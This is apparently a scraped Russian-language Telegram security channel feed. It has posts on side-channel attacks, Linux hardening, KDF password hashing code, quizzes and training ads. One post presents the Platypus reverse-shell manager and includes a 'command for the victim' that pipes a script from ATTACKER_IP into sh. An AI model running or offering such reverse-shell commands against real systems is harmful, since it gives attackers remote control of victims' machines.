Боковые каналы: утечка данных без взлома
👋
⏺ Что это вообще такое: Это способ получить инфу не из самой системы, а из побочных эффектов её работы. Шум, электромагнитное излучение, время выполнения - всё это может выдать секреты.
Посмотрим на примеры таких атак:
1️⃣ Время отклика — сравнение задержек при обработке разных запросов помогает понять, какие данные лежат в памяти. Так работал [Timing Attack на TLS].
2️⃣ Энергопотребление — анализ колебаний напряжения в смарткартах позволял узнать зашифрованные PIN-коды.
3️⃣ Акустика — звук нажатий на клавиатуру позволяет восстановить вводимый текст с точностью до 90%.
4️⃣ Cache timing — атаки вроде Spectre и Meltdown используют особенности архитектуры CPU, чтобы читать память между процессами.
⏺ Чем опасно: Даже без доступа к системе можно получить приватную инфу. Часто такие атаки не логируются, а значит остаются незамеченными.
⏺ Можно ли защититься: Полностью - сложно, но можно снизить риск: делают алгоритмы с одинаковым временем выполнения, рандомизируют работу (например, вставляя шум или задержки), ограничивают физический доступ и учитывают такие атаки на этапе threat modeling.
ZeroDay | #sidechannel
Приветствую в мире цифровой безопасности!Поговорим о не банальном векторе атаки - side-channel attacks.Посмотрим на примеры таких атак:
ZeroDay | #sidechannel
Please open Telegram to view this post
VIEW IN TELEGRAM
Что считается атакой на цепочку поставок ПО (Supply Chain Attack)?
Anonymous Quiz
63%
Внедрение уязвимости через внешнюю библиотеку
13%
XSS в пользовательском интерфейсе
15%
SQL-инъекция в CMS
9%
Phishing для получения логина
This media is not supported in your browser
VIEW IN TELEGRAM
Защищаем Linux-сервер от lateral movement
👋
⏺ Блокируем лишний исходящий трафик: По умолчанию сервер может соединяться с любым адресом. Исправим:
⏺ Отключаем LLMNR и mDNS: Протоколы локального разрешения имён - подарок для атакующего. На проде не нужны:
⏺ Ограничиваем доступ к сокетам ядра: /proc и /sys — часто недооценённая угроза. Убираем излишнюю информацию:
⏺ Контролируем вход по SSH по UID: Создаём отдельного пользователя, которому разрешён доступ наружу, а всем остальным — нет:
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!Сегодня расскажу, как закрыть сервер от “горизонтального перемещения” злоумышленника внутри сети.# Оставим только DNS и APT
iptables -P OUTPUT DROP
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d deb.debian.org -j ACCEPT
echo "LLMNR=no" >> /etc/systemd/resolved.conf
systemctl restart systemd-resolved
# mDNS
systemctl stop avahi-daemon
systemctl disable avahi-daemon
mount -o remount,hidepid=2 /proc
chmod 700 /boot
iptables -A OUTPUT -m owner --uid-owner safeuser -j ACCEPT
iptables -A OUTPUT -j DROP
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Скрытые языки: как инженеры общаются без документации
👋
⏺ Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».
⏺ Примеры скрытого языка на практике:
1️⃣ “Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.
2️⃣ “Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных
3️⃣ deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:
Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.
# Python
@router.get("/profile/{id}")
def get_profile(id: int):
cached = redis.get(id)
if cached:
return cached
profile = db.fetch(id)
redis.set(id, profile)
return profile
// Go
switch msg.Type {
case MsgCreate:
return s.handleCreate(msg)
case MsgDelete:
return s.handleDelete(msg)
default:
logger.Warn("unknown message", zap.String("type", msg.Type))
}
# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api
Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
Данные на продажу: что происходит с инфой после утечек
То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.
⏺ В статье рассказывают, как работает рынок украденных данных: кто продаёт и кто покупает, где торгуют, почему утечка может стоить $20 или $500, и зачем сама служба безопасности иногда выкупает свои же базы. Покажут, как выглядит сделка: от залитого архива до анонимной оплаты Monero.
ZeroDay | #Статья
То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
Какая методика используется для оценки остаточного риска после внедрения защитных мер?
Anonymous Quiz
39%
ISO/IEC 27001
35%
OWASP SAMM
16%
STRIDE
10%
DREAD
Platypus: менеджер обратных shell-сессий на Go
👋
⏺ Что это: Platypus - современный менеджер обратных shell-сессий на Go, который может запускать и управлять кучей подключений одновременно. В общем, можно забыть о вечных танцах с командной строкой. У Platypus есть и терминальный интерфейс, и веб-панель, и даже API, чтобы автоматизировать всё что угодно.
⏺ Установка максимально простая:
⏺ Или через Docker:
Готовая reverse shell-команда для жертвы:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/WangYihang/Platypus
cd Platypus
make install_dependency
make release
./Platypus
docker-compose up -d
Готовая reverse shell-команда для жертвы:
curl http://ATTACKER_IP:13337/ | sh
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования:
Выбирай своё направление:
Please open Telegram to view this post
VIEW IN TELEGRAM
Defense in Depth — это концепция «многослойной защиты»: если один уровень пробит, следующий всё ещё держит оборону. Типо цифрового замка с несколькими дверями.
Вот как это работает по слоям
ZeroDay | #defenseindepth
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Positive Technologies
Все записи PHDays Fest — уже на видеоплатформах 🤩
Разложили их по плейлистам, чтобы вам было удобно смотреть сотни часов крутейшего контента.
• Научпоп
«VK Видео» / RUTUBE
• Технологии под сомнением
«VK Видео» / RUTUBE
• Лица и грани кибербеза
«VK Видео» / RUTUBE
• Defense
«VK Видео» / RUTUBE
• Offense
«VK Видео» / RUTUBE
• Positive Labs
«VK Видео» / RUTUBE
• Архитектура ИБ
«VK Видео» / RUTUBE
• Development Security
«VK Видео» / RUTUBE
• Development Data
«VK Видео» / RUTUBE
• Open Source & Open Security
«VK Видео» / RUTUBE
• Development Ops
«VK Видео» / RUTUBE
• Devices & Technologies
«VK Видео» / RUTUBE
• Development People & Culture
«VK Видео» / RUTUBE
• ИТ-инфраструктура
«VK Видео» / RUTUBE
• AppSec-воркшопы
«VK Видео» / RUTUBE
• ИБ как она есть
«VK Видео» / RUTUBE
• Лайфхаки SOC
«VK Видео» / RUTUBE
• День инвестора POSI
«VK Видео» / RUTUBE
• Development General
«VK Видео» / RUTUBE
• Школа CISO
«VK Видео» / RUTUBE
• Fast track
«VK Видео» / RUTUBE
• Python Day
«VK Видео» / RUTUBE
• Web3
«VK Видео» / RUTUBE
• AI Track
«VK Видео» / RUTUBE
• Партнерский
«VK Видео» / RUTUBE
Также записи можно найти на нашем YouTube-канале и на сайте.
Приятного просмотра!🍿
#PHDays
@Positive_Technologies
Разложили их по плейлистам, чтобы вам было удобно смотреть сотни часов крутейшего контента.
• Научпоп
«VK Видео» / RUTUBE
• Технологии под сомнением
«VK Видео» / RUTUBE
• Лица и грани кибербеза
«VK Видео» / RUTUBE
• Defense
«VK Видео» / RUTUBE
• Offense
«VK Видео» / RUTUBE
• Positive Labs
«VK Видео» / RUTUBE
• Архитектура ИБ
«VK Видео» / RUTUBE
• Development Security
«VK Видео» / RUTUBE
• Development Data
«VK Видео» / RUTUBE
• Open Source & Open Security
«VK Видео» / RUTUBE
• Development Ops
«VK Видео» / RUTUBE
• Devices & Technologies
«VK Видео» / RUTUBE
• Development People & Culture
«VK Видео» / RUTUBE
• ИТ-инфраструктура
«VK Видео» / RUTUBE
• AppSec-воркшопы
«VK Видео» / RUTUBE
• ИБ как она есть
«VK Видео» / RUTUBE
• Лайфхаки SOC
«VK Видео» / RUTUBE
• День инвестора POSI
«VK Видео» / RUTUBE
• Development General
«VK Видео» / RUTUBE
• Школа CISO
«VK Видео» / RUTUBE
• Fast track
«VK Видео» / RUTUBE
• Python Day
«VK Видео» / RUTUBE
• Web3
«VK Видео» / RUTUBE
• AI Track
«VK Видео» / RUTUBE
• Партнерский
«VK Видео» / RUTUBE
Также записи можно найти на нашем YouTube-канале и на сайте.
Приятного просмотра!
#PHDays
@Positive_Technologies
Please open Telegram to view this post
VIEW IN TELEGRAM
Айтишников в 2025 году больше, чем цыган. И каждый, естественно, хочет быть видным сеньором, свою геймдев-студию, 15.000€ зэпэшечку и больше никогда не выходить на рабочие созвоны.
И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля.
➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления.
➦ Получишь все хард и софт скиллы для работы в нише.
➦ Заимеешь переговорные навыки и научишься писать идеальные резюме.
Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком.
А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+KG4wdSHdgb02MjE6
И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля.
➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления.
➦ Получишь все хард и софт скиллы для работы в нише.
➦ Заимеешь переговорные навыки и научишься писать идеальные резюме.
Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком.
А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+KG4wdSHdgb02MjE6
KDF: зачем хэшировать пароли сложно?
👋
⏺ Что это и зачем: KDF - целый подход, как сделать так, чтобы украденный хэш не превратился в пароль. Даже если база данных попала в руки хакера.
Вот в чём фишка:
1️⃣ Удорожание атаки
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
2️⃣ Соль (salt)
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
3️⃣ Итерации и память
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
4️⃣ Никаких rainbow-таблиц
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.
⏺ Почему это критично: Потому что даже «хешированная» база легко вскрывается, если вы использовали обычный MD5 или SHA1. GPU и специализированные ASIC-фермы проверяют миллионы хэшей в секунду. А вот хороший KDF останавливает даже их.
⏺ Примеры KDF, которые реально защищают:
• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.
ZeroDay | #кэширование
Приветствую в мире цифровой безопасности!Сегодня разберём довольно важную, но часто недооценённую тему: функции derivation ключей, или KDF (Key Derivation Function)Вот в чём фишка:
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.
• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.
ZeroDay | #кэширование
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
📁🕵 В Windows есть папка, которая собирает на вас компромат!
Культ безопасности опять предупредил своих подписчиков, как разгрузить компьютер от слежки и лагов системы.
А ещё он рассказывает о признаках майнеров, как удалить трояны и порно-баннеры за 5 минут
Почему греется проц без запущенных приложений и загружен HDD или SSD.
💻 Подпишитесь на Культ Безопасности — залог цифровой гигиены и компьютерной грамотности
Культ безопасности опять предупредил своих подписчиков, как разгрузить компьютер от слежки и лагов системы.
А ещё он рассказывает о признаках майнеров, как удалить трояны и порно-баннеры за 5 минут
Почему греется проц без запущенных приложений и загружен HDD или SSD.
💻 Подпишитесь на Культ Безопасности — залог цифровой гигиены и компьютерной грамотности
Что отслеживает UEBA-система?
Anonymous Quiz
18%
Уязвимости в ПО
23%
Распределение прав доступа
52%
Поведение пользователей и устройств
8%
Доступ к сетевым принтерам
Успейте подать заявку на Pentest Award 2025 до 30 июня!
Это отраслевая награда для специалистов по тестированию на проникновение, которая проводится уже в третий раз. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие бесплатное, главный приз за победу — именная статуэтка, макбук и максимальный почет сообщества этичных хакеров.
За вторые и третьи места призеры получат айфоны и смарт-часы.
Также будут подарки от партнеров проекта: Совкомбанк Технологии и BIZONE Bug Bounty, гранты от учебного центра CyberEd и билеты на конференцию OFFZONЕ. Церемония награждения будет проходить 1 августа в Москве.
Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.
Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/
Реклама. ООО «Авилликс». erid: 2Vtzqv3icvz
Это отраслевая награда для специалистов по тестированию на проникновение, которая проводится уже в третий раз. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.
Участие бесплатное, главный приз за победу — именная статуэтка, макбук и максимальный почет сообщества этичных хакеров.
За вторые и третьи места призеры получат айфоны и смарт-часы.
Также будут подарки от партнеров проекта: Совкомбанк Технологии и BIZONE Bug Bounty, гранты от учебного центра CyberEd и билеты на конференцию OFFZONЕ. Церемония награждения будет проходить 1 августа в Москве.
Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.
Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/
Реклама. ООО «Авилликс». erid: 2Vtzqv3icvz
This media is not supported in your browser
VIEW IN TELEGRAM
KDF: как правильно хэшировать пароли
👋
⏺ Сценарий: допустим, вы разрабатываете веб-приложение и хотите хранить пароли пользователей безопасно. Обычный SHA256 - это не всегда лучшая защита. Вот как надо:
1️⃣ PBKDF2 (подходит даже в legacy-проектах):
2️⃣ scrypt (хорош против атак с видеокартами):
3️⃣ Argon2 (современный стандарт):
ZeroDay | #кэширование
Приветствую в мире цифровой безопасности!В прошлый раз мы обсудили, зачем нужны KDF. Теперь посмотрим, как их применяют на практике.import hashlib
import os
salt = os.urandom(16)
hash = hashlib.pbkdf2_hmac('sha256', b'password123', salt, 100_000)
import hashlib
hash = hashlib.scrypt(
b'password123',
salt=os.urandom(16),
n=2**14, r=8, p=1
)
from argon2 import PasswordHasher
ph = PasswordHasher()
hash = ph.hash("password123")
ZeroDay | #кэширование
Please open Telegram to view this post
VIEW IN TELEGRAM
Что общего между хакерской атакой и защитой от неё?
И то, и другое сегодня используют нейросети и автоматизированные системы. Узнайте, как начать карьеру в сфере кибербезопасности на дне открытых дверей онлайн-магистратуры УрФУ и Нетологии «Современные технологии безопасных систем».
На встрече вы узнаете:
– кто такой аналитик SOC и специалист по безопасной разработке;
– какие навыки нужны, чтобы стать востребованным на рынке;
– что нужно для поступления и обучения онлайн.
📅 19 июня, 18:00 (Мск)
🔗 [Регистрация]
Реклама. ООО "Нетология", ИНН: 7726464125, erid: 2W5zFGWMnsA
И то, и другое сегодня используют нейросети и автоматизированные системы. Узнайте, как начать карьеру в сфере кибербезопасности на дне открытых дверей онлайн-магистратуры УрФУ и Нетологии «Современные технологии безопасных систем».
На встрече вы узнаете:
– кто такой аналитик SOC и специалист по безопасной разработке;
– какие навыки нужны, чтобы стать востребованным на рынке;
– что нужно для поступления и обучения онлайн.
📅 19 июня, 18:00 (Мск)
🔗 [Регистрация]
Реклама. ООО "Нетология", ИНН: 7726464125, erid: 2W5zFGWMnsA